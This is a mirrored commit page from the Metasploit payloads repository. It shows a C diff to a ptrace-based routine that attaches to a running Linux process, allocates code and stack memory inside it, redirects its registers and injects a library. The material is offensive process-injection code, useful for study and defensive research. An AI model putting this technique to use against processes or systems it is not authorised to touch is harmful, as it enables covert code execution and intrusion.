mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-03-12 12:14:29 +01:00
Create new code memory
This commit is contained in:
parent
79692d5986
commit
63e993c735
@ -84,11 +84,12 @@ save_state(LONG pid, state *s) {
|
||||
* @brief Restores the process state and detaches.
|
||||
* @param pid Process identifier to restore.
|
||||
* @param s Pointer to \c state with code and registers.
|
||||
* @param only_memory Idicates if restore only memory at EIP or also registers
|
||||
* @returns Indication of success or failure.
|
||||
* @retval 0 Indicates success.
|
||||
*/
|
||||
LONG
|
||||
restore_state(LONG pid, state *s) {
|
||||
restore_state(LONG pid, state *s, int only_memory) {
|
||||
unsigned long *mem_ptr = NULL;
|
||||
LONG i = 0;
|
||||
LONG result = 0;
|
||||
@ -105,6 +106,9 @@ restore_state(LONG pid, state *s) {
|
||||
if (result != 0)
|
||||
return result;
|
||||
|
||||
if (only_memory > 0)
|
||||
return 0;
|
||||
|
||||
result = setregs(pid, &(s->regs));
|
||||
if (result != 0)
|
||||
return result;
|
||||
@ -250,6 +254,8 @@ call(LONG pid, struct user_regs_struct *regs, unsigned long addr) {
|
||||
LONG
|
||||
inject_library(LONG pid, library *l) {
|
||||
state s;
|
||||
long code_mem;
|
||||
long stack_mem;
|
||||
struct user_regs_struct regs;
|
||||
ULONG library_size = _SIZE_OF(l->length);
|
||||
unsigned long *buf_ptr = (unsigned long *)l->data;
|
||||
@ -260,7 +266,6 @@ inject_library(LONG pid, library *l) {
|
||||
goto end;
|
||||
}
|
||||
|
||||
|
||||
dprintf("[INJECT] Saving state");
|
||||
result = attach(pid);
|
||||
if (result != 0)
|
||||
@ -272,14 +277,31 @@ inject_library(LONG pid, library *l) {
|
||||
|
||||
memcpy(®s, &(s.regs), sizeof(struct user_regs_struct));
|
||||
|
||||
dprintf("[INJECT] Creating new code memory");
|
||||
result = allocate(pid, ®s, NULL, CODE_SIZE);
|
||||
if (result != 0)
|
||||
goto restore;
|
||||
|
||||
dprintf("[INJECT] New code memory on 0x%x, fixing registers", regs.eax);
|
||||
code_mem = regs.eax;
|
||||
regs.eip = code_mem;
|
||||
|
||||
result = setregs(pid, ®s);
|
||||
if (result != 0)
|
||||
goto restore;
|
||||
|
||||
dprintf("[INJECT] Restoring code on original process");
|
||||
restore_state(pid, &s, 1);
|
||||
|
||||
dprintf("[INJECT] Creating new stack");
|
||||
result = allocate(pid, ®s, NULL, STACK_SIZE);
|
||||
result = allocate(pid, ®s, NULL, STACK_SIZE);
|
||||
if (result != 0)
|
||||
goto restore;
|
||||
|
||||
dprintf("[INJECT] New stack on 0x%x, fixing registers", regs.eax);
|
||||
regs.esp = regs.eax + STACK_SIZE;
|
||||
regs.eip = s.regs.eip;
|
||||
stack_mem = regs.eax + STACK_SIZE;
|
||||
regs.esp = stack_mem;//regs.eax + STACK_SIZE;
|
||||
regs.eip = code_mem;//s.regs.eip;
|
||||
|
||||
result = setregs(pid, ®s);
|
||||
if (result != 0)
|
||||
@ -301,7 +323,8 @@ inject_library(LONG pid, library *l) {
|
||||
goto restore;
|
||||
|
||||
dprintf("[INJECT] Fixing registers");
|
||||
regs.eip = s.regs.eip;
|
||||
regs.esp = stack_mem;
|
||||
regs.eip = code_mem;//s.regs.eip;
|
||||
result = setregs(pid, ®s);
|
||||
if (result != 0)
|
||||
goto restore;
|
||||
@ -316,7 +339,7 @@ inject_library(LONG pid, library *l) {
|
||||
goto end;
|
||||
|
||||
restore:
|
||||
restore_state(pid, &s);
|
||||
restore_state(pid, &s, 0);
|
||||
end:
|
||||
return result;
|
||||
}
|
||||
|
@ -31,6 +31,8 @@
|
||||
#define ENTRY_POINT_POS 11
|
||||
/*! Length of the new stack to allocate */
|
||||
#define STACK_SIZE 0x200000
|
||||
/*! Length of the new memory to store code stubs */
|
||||
#define CODE_SIZE 0x1000
|
||||
|
||||
/*! @brief Container struct for a library to inject and execute. */
|
||||
typedef struct {
|
||||
@ -52,7 +54,7 @@ typedef struct {
|
||||
} state;
|
||||
|
||||
LONG save_state(LONG pid, state *s);
|
||||
LONG restore_state(LONG pid, state *s);
|
||||
LONG restore_state(LONG pid, state *s, int only_memory);
|
||||
BOOL wait_trap(LONG pid);
|
||||
LONG execute_stub(LONG pid, unsigned long addr, unsigned long *stub, ULONG stub_size);
|
||||
LONG allocate(LONG pid, struct user_regs_struct *regs, unsigned long addr, size_t length);
|
||||
|
Loading…
x
Reference in New Issue
Block a user